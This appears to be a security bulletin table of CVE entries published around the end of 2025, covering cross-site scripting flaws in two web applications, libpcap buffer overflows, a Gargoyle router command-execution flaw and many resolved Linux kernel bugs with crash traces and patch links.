| youlaitech--vue3-element-admin | A weakness has been identified in youlaitech vue3-element-admin up to 3.4.0. This issue affects some unknown processing of the file src/views/system/notice/index.vue of the component Notice Handler. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 2.4 | CVE-2025-15372 | VDB-339080 | youlaitech vue3-element-admin Notice index.vue cross site scripting VDB-339080 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718345 | youlaitech vue3-element-admin <=v3.4.0 XSS https://github.com/AnalogyC0de/public_exp/blob/main/archives/vue3-element-admin/report.md https://github.com/AnalogyC0de/public_exp/blob/main/archives/vue3-element-admin/report.md#proof-of-concept |
| xnx3--wangmarket | A vulnerability was found in xnx3 wangmarket up to 6.4. This affects an unknown function of the file /siteVar/save.do of the component Add Global Variable Handler. The manipulation of the argument Remark/Variable Value results in cross site scripting. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-01 | 2.4 | CVE-2025-15416 | VDB-339337 | xnx3 wangmarket Add Global Variable save.do cross site scripting VDB-339337 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721080 | xnx3 https://github.com/xnx3/wangmarket <=v6.4 Cross Site Scripting https://github.com/yuccun/CVE/blob/main/wangmarket-Stored_Cross-Site_Scripting.md |
| The Tcpdump Group--libpcap | pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer. | 2025-12-31 | 1.9 | CVE-2025-11961 | https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02 |
| The Tcpdump Group--libpcap | On Windows only, if libpcap needs to convert a Windows error message to UTF-8 and the message includes characters that UTF-8 represents using 4 bytes, utf_16le_to_utf_8_truncated() can write data beyond the end of the provided buffer. | 2025-12-31 | 1.9 | CVE-2025-11964 | https://github.com/the-tcpdump-group/libpcap/commit/7fabf607f2319a36a0bd78444247180acb838e69 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Gargoyle--Gargoyle Router Management Utility | Gargoyle router management utility versions 1.5.x contain an authenticated OS command execution vulnerability in /utility/run_commands.sh. The application fails to properly restrict or validate input supplied via the 'commands' parameter, allowing an authenticated attacker to execute arbitrary shell commands on the underlying system. Successful exploitation may result in full compromise of the device, including unauthorized access to system files and execution of attacker-controlled commands. | 2025-12-31 | not yet calculated | CVE-2015-10145 | https://packetstorm.news/files/id/132149 https://www.gargoyle-router.com/ https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/ https://www.vulncheck.com/advisories/gargoyle-authenticated-os-command-execution-via-run-commands-sh |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mei: fix potential NULL-ptr deref after clone If cloning the SKB fails, don't try to use it, but rather return as if we should pass it. Coverity CID: 1503456 | 2025-12-30 | not yet calculated | CVE-2022-50784 | https://git.kernel.org/stable/c/8b8e25073f3dab93554ee3d5b264f7c013ebd92a https://git.kernel.org/stable/c/0183b7c49cfdda91284505cbcdc7feecde48cbb9 https://git.kernel.org/stable/c/d3df49dda431f7ae4132a9a0ac25a5134c04e812 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fsi: occ: Prevent use after free Use get_device and put_device in the open and close functions to make sure the device doesn't get freed while a file descriptor is open. Also, lock around the freeing of the device buffer and check the buffer before using it in the submit function. | 2025-12-30 | not yet calculated | CVE-2022-50785 | https://git.kernel.org/stable/c/1d5ad0a874ddfcee9f932f54b1d34cbe8b9ddcfe https://git.kernel.org/stable/c/3593e8efc9f0dac6be70bd5c964eadaa86bf2713 https://git.kernel.org/stable/c/d3e1e24604031b0d83b6c2d38f54eeea265cfcc0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: s5p-mfc: Clear workbit to handle error condition During error on CLOSE_INSTANCE command, ctx_work_bits was not getting cleared. During consequent mfc execution NULL pointer dereferencing of this context led to kernel panic. This patch fixes this issue by making sure to clear ctx_work_bits always. | 2025-12-30 | not yet calculated | CVE-2022-50786 | https://git.kernel.org/stable/c/12242bd13ce68acd571b2cce6ab302e154e8a4ee https://git.kernel.org/stable/c/640075400c7c577b0f5369b935e22a588773fafa https://git.kernel.org/stable/c/8ff64edf9d16e8c277dcc8189794763624e6b4b8 https://git.kernel.org/stable/c/ff27800c0a6d81571671b33f696109804d015409 https://git.kernel.org/stable/c/09c1fbbe532758e4046c20829f4c0c50b99332dc https://git.kernel.org/stable/c/bd1b72f0c39a0d791a087b4e643701a48328ba8e https://git.kernel.org/stable/c/d3f3c2fe54e30b0636496d842ffbb5ad3a547f9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xhci: dbc: Fix memory leak in xhci_alloc_dbc() If DbC is already in use, then the allocated memory for the xhci_dbc struct doesn't get freed before returning NULL, which leads to a memleak. | 2025-12-30 | not yet calculated | CVE-2022-50809 | https://git.kernel.org/stable/c/103b459590e1eb4d80b02761eb36c7cae1d9b58e https://git.kernel.org/stable/c/116d6a6964986ea7eb516daa36128d270f1f248d https://git.kernel.org/stable/c/69e67c804d09a6b1bcda1f4f242f151f813eeb4a https://git.kernel.org/stable/c/d591b32e519603524a35b172156db71df9116902 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rapidio: devices: fix missing put_device in mport_cdev_open When kfifo_alloc fails, the refcount of chdev->dev is left incremental. We should use put_device(&chdev->dev) to decrease the ref count of chdev->dev to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2022-50810 | https://git.kernel.org/stable/c/6e4540e0970030e140998ce8847f5f0171b5afa1 https://git.kernel.org/stable/c/ae57222402bea455e60cc51d2f52ce73b63b7af8 https://git.kernel.org/stable/c/dfee9fe93dd34cd9d49520718f6ec2072de25e48 https://git.kernel.org/stable/c/bb7397f6312d2cbf05e415676ed5b1655cb82a34 https://git.kernel.org/stable/c/53915ecc43c5139d6cdd1caa4fdc9290b9597008 https://git.kernel.org/stable/c/a0d93aac54ce07a7cc71e90645d0cdabbda50450 https://git.kernel.org/stable/c/162433a96079bfa5ec748c486b4570f138d04fb5 https://git.kernel.org/stable/c/b596242585984b5f3085aa8f7a82c65640b384b6 https://git.kernel.org/stable/c/d5b6e6eba3af11cb2a2791fa36a2524990fcde1a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix missing unmap if z_erofs_get_extent_compressedlen() fails Otherwise, meta buffers could be leaked. | 2025-12-30 | not yet calculated | CVE-2022-50811 | https://git.kernel.org/stable/c/091a8ca572a2e48554427feda78aa503e98c1028 https://git.kernel.org/stable/c/373b6f350aecf5dca2e7474f0b4ec8cca659f2f0 https://git.kernel.org/stable/c/d5d188b8f8b38d3d71dd05993874b4fc9284ce95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: security: Restrict CONFIG_ZERO_CALL_USED_REGS to gcc or clang > 15.0.6 A bad bug in clang's implementation of -fzero-call-used-regs can result in NULL pointer dereferences (see the links above the check for more information). Restrict CONFIG_CC_HAS_ZERO_CALL_USED_REGS to either a supported GCC version or a clang newer than 15.0.6, which will catch both a theoretical 15.0.7 and the upcoming 16.0.0, which will both have the bug fixed. | 2025-12-30 | not yet calculated | CVE-2022-50812 | https://git.kernel.org/stable/c/8a4236456a3a402f6bb92aa7b75e7a3b4ef7a72c https://git.kernel.org/stable/c/0b202dfedb5aa2e7d07d849be33fa3a48c026926 https://git.kernel.org/stable/c/21ca0bfa11bbb9a9207f5d2104f47d3d71b4616e https://git.kernel.org/stable/c/d6a9fb87e9d18f3394a9845546bbe868efdccfd2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drivers: mcb: fix resource leak in mcb_probe() When probe hook function failed in mcb_probe(), it doesn't put the device. Compiled test only. | 2025-12-30 | not yet calculated | CVE-2022-50813 | https://git.kernel.org/stable/c/531ac7b911a962b3b29565dad6ea6b5c3fad3317 https://git.kernel.org/stable/c/6f3467aa5712e6b5550e75a16454b3f17aa1f380 https://git.kernel.org/stable/c/e420ca85bf42a684ea729c505c07de6709500ed2 https://git.kernel.org/stable/c/68e54d9ee8222d7805a0b9d3e1c37b8cf3be536a https://git.kernel.org/stable/c/0d1c2c8db28919c4351000d7c1692f1767bdc4f7 https://git.kernel.org/stable/c/f3686e5e8de0a03c8e70e3ee0ce3078fed612909 https://git.kernel.org/stable/c/0a23dda78946f604ff752fe223c3c1f4fa6dd7b4 https://git.kernel.org/stable/c/0468a585710bbb807a1b9c31df54bcf564d28b2b https://git.kernel.org/stable/c/d7237462561fcd224fa687c56ccb68629f50fc0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: hisilicon/zip - fix mismatch in get/set sgl_sge_nr KASAN reported this Bug: [17619.659757] BUG: KASAN: global-out-of-bounds in param_get_int+0x34/0x60 [17619.673193] Read of size 4 at addr fffff01332d7ed00 by task read_all/1507958 ... [17619.698934] The buggy address belongs to the variable: [17619.708371] sgl_sge_nr+0x0/0xffffffffffffa300 [hisi_zip] There is a mismatch in hisi_zip when get/set the variable sgl_sge_nr. The type of sgl_sge_nr is u16, and get/set sgl_sge_nr by param_get/set_int. Replacing param_get/set_int to param_get/set_ushort can fix this bug. | 2025-12-30 | not yet calculated | CVE-2022-50814 | https://git.kernel.org/stable/c/d88b88514ef28515ccfa1f1787c2aedef75a79dd https://git.kernel.org/stable/c/272093471305261c4e07a2fc97c2d1e53cd56819 https://git.kernel.org/stable/c/f8a983d6e01b198320d310cb1326364d7d973b2a https://git.kernel.org/stable/c/5eaebd19fbb0e26e73a34f55d3b1dc310df0eb15 https://git.kernel.org/stable/c/d74f9340097a881869c4c22ca376654cc2516ecc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext2: Add sanity checks for group and filesystem size Add sanity check that filesystem size does not exceed the underlying device size and that group size is big enough so that metadata can fit into it. This avoid trying to mount some crafted filesystems with extremely large group counts. | 2025-12-30 | not yet calculated | CVE-2022-50815 | https://git.kernel.org/stable/c/40ff52527daec00cf1530c17a95636916ddd3b38 https://git.kernel.org/stable/c/321440079763998076b75e0c802524e2218a7d97 https://git.kernel.org/stable/c/d766f2d1e3e3bd44024a7f971ffcf8b8fbb7c5d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: ensure sane device mtu in tunnels Another syzbot report [1] with no reproducer hints at a bug in ip6_gre tunnel (dev:ip6gretap0) Since ipv6 mcast code makes sure to read dev->mtu once and applies a sanity check on it (see commit b9b312a7a451 "ipv6: mcast: better catch silly mtu values"), a remaining possibility is that a layer is able to set dev->mtu to an underflowed value (high order bit set). This could happen indeed in ip6gre_tnl_link_config_route(), ip6_tnl_link_config() and ipip6_tunnel_bind_dev() Make sure to sanitize mtu value in a local variable before it is written once on dev->mtu, as lockless readers could catch wrong temporary value. [1] skbuff: skb_over_panic: text:ffff80000b7a2f38 len:40 put:40 head:ffff000149dcf200 data:ffff000149dcf2b0 tail:0xd8 end:0xc0 dev:ip6gretap0 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:120 Internal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP Modules linked in: CPU: 1 PID: 10241 Comm: kworker/1:1 Not tainted 6.0.0-rc7-syzkaller-18095-gbbed346d5a96 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/30/2022 Workqueue: mld mld_ifc_work pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : skb_panic+0x4c/0x50 net/core/skbuff.c:116 lr : skb_panic+0x4c/0x50 net/core/skbuff.c:116 sp : ffff800020dd3b60 x29: ffff800020dd3b70 x28: 0000000000000000 x27: ffff00010df2a800 x26: 00000000000000c0 x25: 00000000000000b0 x24: ffff000149dcf200 x23: 00000000000000c0 x22: 00000000000000d8 x21: ffff80000b7a2f38 x20: ffff00014c2f7800 x19: 0000000000000028 x18: 00000000000001a9 x17: 0000000000000000 x16: ffff80000db49158 x15: ffff000113bf1a80 x14: 0000000000000000 x13: 00000000ffffffff x12: ffff000113bf1a80 x11: ff808000081c0d5c x10: 0000000000000000 x9 : 73f125dc5c63ba00 x8 : 73f125dc5c63ba00 x7 : ffff800008161d1c x6 : 0000000000000000 x5 : 0000000000000080 x4 : 0000000000000001 x3 : 0000000000000000 x2 : ffff0001fefddcd0 x1 : 0000000100000000 x0 : 0000000000000089 Call trace: skb_panic+0x4c/0x50 net/core/skbuff.c:116 skb_over_panic net/core/skbuff.c:125 [inline] skb_put+0xd4/0xdc net/core/skbuff.c:2049 ip6_mc_hdr net/ipv6/mcast.c:1714 [inline] mld_newpack+0x14c/0x270 net/ipv6/mcast.c:1765 add_grhead net/ipv6/mcast.c:1851 [inline] add_grec+0xa20/0xae0 net/ipv6/mcast.c:1989 mld_send_cr+0x438/0x5a8 net/ipv6/mcast.c:2115 mld_ifc_work+0x38/0x290 net/ipv6/mcast.c:2653 process_one_work+0x2d8/0x504 kernel/workqueue.c:2289 worker_thread+0x340/0x610 kernel/workqueue.c:2436 kthread+0x12c/0x158 kernel/kthread.c:376 ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860 Code: 91011400 aa0803e1 a90027ea 94373093 (d4210000) | 2025-12-30 | not yet calculated | CVE-2022-50816 | https://git.kernel.org/stable/c/2bab6fa449d16af36d9c9518865f783a15f446c7 https://git.kernel.org/stable/c/78297d513157a31fd629626fe4cbb85a7dcbb94a https://git.kernel.org/stable/c/af51fc23a03f02b0c6df09ab0d60f23794436052 https://git.kernel.org/stable/c/44affe7ede596f078c4f2f41e0d160266ccda818 https://git.kernel.org/stable/c/ad3f1d9bf162c487d23df684852597961b745cae https://git.kernel.org/stable/c/ccd94bd4939690e24d13e23814bce7ed853a09f3 https://git.kernel.org/stable/c/d89d7ff01235f218dad37de84457717f699dee79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hsr: avoid possible NULL deref in skb_clone() syzbot got a crash [1] in skb_clone(), caused by a bug in hsr_get_untagged_frame(). When/if create_stripped_skb_hsr() returns NULL, we must not attempt to call skb_clone(). While we are at it, replace a WARN_ONCE() by netdev_warn_once(). [1] general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f] CPU: 1 PID: 754 Comm: syz-executor.0 Not tainted 6.0.0-syzkaller-02734-g0326074ff465 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/22/2022 RIP: 0010:skb_clone+0x108/0x3c0 net/core/skbuff.c:1641 Code: 93 02 00 00 49 83 7c 24 28 00 0f 85 e9 00 00 00 e8 5d 4a 29 fa 4c 8d 75 7e 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6 04 02 4c 89 f2 83 e2 07 38 d0 7f 08 84 c0 0f 85 9e 01 00 00 RSP: 0018:ffffc90003ccf4e0 EFLAGS: 00010207 RAX: dffffc0000000000 RBX: ffffc90003ccf5f8 RCX: ffffc9000c24b000 RDX: 000000000000000f RSI: ffffffff8751cb13 RDI: 0000000000000000 RBP: 0000000000000000 R08: 00000000000000f0 R09: 0000000000000140 R10: fffffbfff181d972 R11: 0000000000000000 R12: ffff888161fc3640 R13: 0000000000000a20 R14: 000000000000007e R15: ffffffff8dc5f620 FS: 00007feb621e4700(0000) GS:ffff8880b9b00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007feb621e3ff8 CR3: 00000001643a9000 CR4: 00000000003506e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> hsr_get_untagged_frame+0x4e/0x610 net/hsr/hsr_forward.c:164 hsr_forward_do net/hsr/hsr_forward.c:461 [inline] hsr_forward_skb+0xcca/0x1d50 net/hsr/hsr_forward.c:623 hsr_handle_frame+0x588/0x7c0 net/hsr/hsr_slave.c:69 __netif_receive_skb_core+0x9fe/0x38f0 net/core/dev.c:5379 __netif_receive_skb_one_core+0xae/0x180 net/core/dev.c:5483 __netif_receive_skb+0x1f/0x1c0 net/core/dev.c:5599 netif_receive_skb_internal net/core/dev.c:5685 [inline] netif_receive_skb+0x12f/0x8d0 net/core/dev.c:5744 tun_rx_batched+0x4ab/0x7a0 drivers/net/tun.c:1544 tun_get_user+0x2686/0x3a00 drivers/net/tun.c:1995 tun_chr_write_iter+0xdb/0x200 drivers/net/tun.c:2025 call_write_iter include/linux/fs.h:2187 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x9e9/0xdd0 fs/read_write.c:584 ksys_write+0x127/0x250 fs/read_write.c:637 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-30 | not yet calculated | CVE-2022-50817 | https://git.kernel.org/stable/c/ff7ba766758313129794f150bbc4d351b5e17a53 https://git.kernel.org/stable/c/35ece858660eae13ee0242496a1956c39d29418e https://git.kernel.org/stable/c/c46f2e0fcd1ecfc6046e5cf785ff89f0572f94e4 https://git.kernel.org/stable/c/d8b57135fd9ffe9a5b445350a686442a531c5339 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: pm8001: Fix running_req for internal abort commands Disabling the remote phy for a SATA disk causes a hang: root@(none)$ more /sys/class/sas_phy/phy-0:0:8/target_port_protocols sata root@(none)$ echo 0 > sys/class/sas_phy/phy-0:0:8/enable root@(none)$ [ 67.855950] sas: ex 500e004aaaaaaa1f phy08 change count has changed [ 67.920585] sd 0:0:2:0: [sdc] Synchronizing SCSI cache [ 67.925780] sd 0:0:2:0: [sdc] Synchronize Cache(10) failed: Result: hostbyte=0x04 driverbyte=DRIVER_OK [ 67.935094] sd 0:0:2:0: [sdc] Stopping disk [ 67.939305] sd 0:0:2:0: [sdc] Start/Stop Unit failed: Result: hostbyte=0x04 driverbyte=DRIVER_OK ... [ 123.998998] INFO: task kworker/u192:1:642 blocked for more than 30 seconds. [ 124.005960] Not tainted 6.0.0-rc1-205202-gf26f8f761e83 #218 [ 124.012049] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 124.019872] task:kworker/u192:1 state:D stack:0 pid: 642 ppid: 2 flags:0x00000008 [ 124.028223] Workqueue: 0000:04:00.0_event_q sas_port_event_worker [ 124.034319] Call trace: [ 124.036758] __switch_to+0x128/0x278 [ 124.040333] __schedule+0x434/0xa58 [ 124.043820] schedule+0x94/0x138 [ 124.047045] schedule_timeout+0x2fc/0x368 [ 124.051052] wait_for_completion+0xdc/0x200 [ 124.055234] __flush_workqueue+0x1a8/0x708 [ 124.059328] sas_porte_broadcast_rcvd+0xa8/0xc0 [ 124.063858] sas_port_event_worker+0x60/0x98 [ 124.068126] process_one_work+0x3f8/0x660 [ 124.072134] worker_thread+0x70/0x700 [ 124.075793] kthread+0x1a4/0x1b8 [ 124.079014] ret_from_fork+0x10/0x20 The issue is that the per-device running_req read in pm8001_dev_gone_notify() never goes to zero and we never make progress. This is caused by missing accounting for running_req for when an internal abort command completes. In commit 2cbbf489778e ("scsi: pm8001: Use libsas internal abort support") we started to send internal abort commands as a proper sas_task. In this when we deliver a sas_task to HW the per-device running_req is incremented in pm8001_queue_command(). However it is never decremented for internal abort commnds, so decrement in pm8001_mpi_task_abort_resp(). | 2025-12-30 | not yet calculated | CVE-2022-50818 | https://git.kernel.org/stable/c/4e750e0d8e486569fcb7f4ba6f6471673ce7d8a2 https://git.kernel.org/stable/c/a62b9fc9775fbc8e666bb328f6e53c168054d6fe https://git.kernel.org/stable/c/d8c22c4697c11ed28062afe3c2b377025be11a23 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udmabuf: Set ubuf->sg = NULL if the creation of sg table fails When userspace tries to map the dmabuf and if for some reason (e.g. OOM) the creation of the sg table fails, ubuf->sg needs to be set to NULL. Otherwise, when the userspace subsequently closes the dmabuf fd, we'd try to erroneously free the invalid sg table from release_udmabuf resulting in the following crash reported by syzbot: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 PID: 3609 Comm: syz-executor487 Not tainted 5.19.0-syzkaller-13930-g7ebfc85e2cd7 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/22/2022 RIP: 0010:dma_unmap_sgtable include/linux/dma-mapping.h:378 [inline] RIP: 0010:put_sg_table drivers/dma-buf/udmabuf.c:89 [inline] RIP: 0010:release_udmabuf+0xcb/0x4f0 drivers/dma-buf/udmabuf.c:114 Code: 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 2b 04 00 00 48 8d 7d 0c 4c 8b 63 30 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 e2 RSP: 0018:ffffc900037efd30 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffffffff8cb67800 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff84ad27e0 RDI: 0000000000000000 RBP: fffffffffffffff4 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000000000000 R11: 000000000008c07c R12: ffff88801fa05000 R13: ffff888073db07e8 R14: ffff888025c25440 R15: 0000000000000000 FS: 0000555555fc4300(0000) GS:ffff8880b9a00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fc1c0ce06e4 CR3: 00000000715e6000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> dma_buf_release+0x157/0x2d0 drivers/dma-buf/dma-buf.c:78 __dentry_kill+0x42b/0x640 fs/dcache.c:612 dentry_kill fs/dcache.c:733 [inline] dput+0x806/0xdb0 fs/dcache.c:913 __fput+0x39c/0x9d0 fs/file_table.c:333 task_work_run+0xdd/0x1a0 kernel/task_work.c:177 ptrace_notify+0x114/0x140 kernel/signal.c:2353 ptrace_report_syscall include/linux/ptrace.h:420 [inline] ptrace_report_syscall_exit include/linux/ptrace.h:482 [inline] syscall_exit_work kernel/entry/common.c:249 [inline] syscall_exit_to_user_mode_prepare+0x129/0x280 kernel/entry/common.c:276 __syscall_exit_to_user_mode_work kernel/entry/common.c:281 [inline] syscall_exit_to_user_mode+0x9/0x50 kernel/entry/common.c:294 do_syscall_64+0x42/0xb0 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7fc1c0c35b6b Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 63 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 0c e8 a1 fc ff ff 8b 44 RSP: 002b:00007ffd78a06090 EFLAGS: 00000293 ORIG_RAX: 0000000000000003 RAX: 0000000000000000 RBX: 0000000000000007 RCX: 00007fc1c0c35b6b RDX: 0000000020000280 RSI: 0000000040086200 RDI: 0000000000000006 RBP: 0000000000000007 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 000000000000000c R13: 0000000000000003 R14: 00007fc1c0cfe4a0 R15: 00007ffd78a06140 </TASK> Modules linked in: ---[ end trace 0000000000000000 ]--- RIP: 0010:dma_unmap_sgtable include/linux/dma-mapping.h:378 [inline] RIP: 0010:put_sg_table drivers/dma-buf/udmabuf.c:89 [inline] RIP: 0010:release_udmabuf+0xcb/0x4f0 drivers/dma-buf/udmabuf.c:114 | 2025-12-30 | not yet calculated | CVE-2022-50819 | https://git.kernel.org/stable/c/bbe2f6f90310b3a0b5de4e0dc022b36faabfd718 https://git.kernel.org/stable/c/dfbed8c92eb853929f4fa676ba493391dab47be4 https://git.kernel.org/stable/c/fc285549f454c0f50f87ec945fc0bf44719c0fa4 https://git.kernel.org/stable/c/9861e43f097a50678041f973347b3a88f2da09cf https://git.kernel.org/stable/c/d9c04a1b7a15b5e74b2977461d9511e497f05d8f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/arm_dmc620: Fix hotplug callback leak in dmc620_pmu_init() dmc620_pmu_init() won't remove the callback added by cpuhp_setup_state_multi() when platform_driver_register() failed. Remove the callback by cpuhp_remove_multi_state() in fail path. Similar to the handling of arm_ccn_init() in commit 26242b330093 ("bus: arm-ccn: Prevent hotplug callback leak") | 2025-12-30 | not yet calculated | CVE-2022-50820 | https://git.kernel.org/stable/c/b99fbe8d949a99fe456f08c7aad421327685aa50 https://git.kernel.org/stable/c/af170afa97e50d4169cfaa7ff4ec5d3841182641 https://git.kernel.org/stable/c/adf7c3bbcc819db6e95b6a61c9822230f0ef4778 https://git.kernel.org/stable/c/d9f564c966e63925aac4ba273a9319d7fb6f4b4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: Don't leak netobj memory when gss_read_proxy_verf() fails | 2025-12-30 | not yet calculated | CVE-2022-50821 | https://git.kernel.org/stable/c/76f2497a2faa6a4e91efb94a7f55705b403273fd https://git.kernel.org/stable/c/aa91afe597401b78baa7d751c71eedb92c80bd4d https://git.kernel.org/stable/c/2cd6026e257362f030c8be57abaf7fc0049df60a https://git.kernel.org/stable/c/d01fa993eb7fbc305f0a9c3e8bfac6513efc13b6 https://git.kernel.org/stable/c/67eb848161c2799f2007968ea3bc87adb15c9567 https://git.kernel.org/stable/c/c9ded831e2552b9c3cab7e2591a190e94f9d29c0 https://git.kernel.org/stable/c/da522b5fe1a5f8b7c20a0023e87b52a150e53bf5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/restrack: Release MR restrack when delete The MR restrack also needs to be released when delete it, otherwise it cause memory leak as the task struct won't be released. | 2025-12-30 | not yet calculated | CVE-2022-50822 | https://git.kernel.org/stable/c/13586753ae55146269a6dc8b216f17d86b81560c https://git.kernel.org/stable/c/37c90753079fc95d93cc31b79796dd2ae57ad018 https://git.kernel.org/stable/c/8731cb5c7820bef577bab4ff17691fbf61c671cb https://git.kernel.org/stable/c/dac153f2802db1ad46207283cb9b2aae3d707a45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: tegra: Fix refcount leak in tegra114_clock_init of_find_matching_node() returns a node pointer with refcount incremented, we should use of_node_put() on it when not need anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2022-50823 | https://git.kernel.org/stable/c/1f0e1cbbaffd729560716e9592aa5e609ea93bb6 https://git.kernel.org/stable/c/ce699dcdac2bfdb6b238f2517ba41d9623b15f46 https://git.kernel.org/stable/c/8cc87a9c142ae0e276a3ff9ce50f78a1668da36f https://git.kernel.org/stable/c/5984b1d66126b024ee77482602ac6e51b53f4116 https://git.kernel.org/stable/c/c01bfd23cc13a420b3f6a36bcab98410f49d480d https://git.kernel.org/stable/c/e7a57fb92af52c4da69cd947752e8946e5ada50a https://git.kernel.org/stable/c/8e1fe30253930c6a67385c19802c5ab8706a76d9 https://git.kernel.org/stable/c/a7d3fb5814c73d7d49913e4294f8f508a3038bb4 https://git.kernel.org/stable/c/db16a80c76ea395766913082b1e3f939dde29b2c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: tpm_tis: Add the missed acpi_put_table() to fix memory leak In check_acpi_tpm2(), we get the TPM2 table just to make sure the table is there, not used after the init, so the acpi_put_table() should be added to release the ACPI memory. | 2025-12-30 | not yet calculated | CVE-2022-50824 | https://git.kernel.org/stable/c/8bc6c10d3f389693410adb14b4e9deec01ff6334 https://git.kernel.org/stable/c/de667a2704ae799f697fd45cf4317623d8c79fb7 https://git.kernel.org/stable/c/e027f3b9fabd2b410a4e6a7651e7a45b87019f23 https://git.kernel.org/stable/c/3b6c822238da9ee8984803355601bcc603d49cb5 https://git.kernel.org/stable/c/43135fb098126ef2cd6ed584900fd7bfa25f95ce https://git.kernel.org/stable/c/e0d1cf8ef84bb14a673215699fb8acc187aa2c4a https://git.kernel.org/stable/c/e60fa800a32a693d672b1a091424d780278c4587 https://git.kernel.org/stable/c/db9622f762104459ff87ecdf885cc42c18053fd9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: wusb3801: fix fwnode refcount leak in wusb3801_probe() I got the following report while doing fault injection test: OF: ERROR: memory leak, expected refcount 1 instead of 4, of_node_get()/of_node_put() unbalanced - destroy cset entry: attach overlay node /i2c/tcpc@60/connector If wusb3801_hw_init() fails, fwnode_handle_put() needs be called to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2022-50825 | https://git.kernel.org/stable/c/de1e2eb7f102e3073714396414592a39efb66b3e https://git.kernel.org/stable/c/82d1211f673bbdc822eaf1dbcbf1f2ae06556964 https://git.kernel.org/stable/c/dc18a4c7b3bd447cef2395deeb1f6ac16dfaca0e |
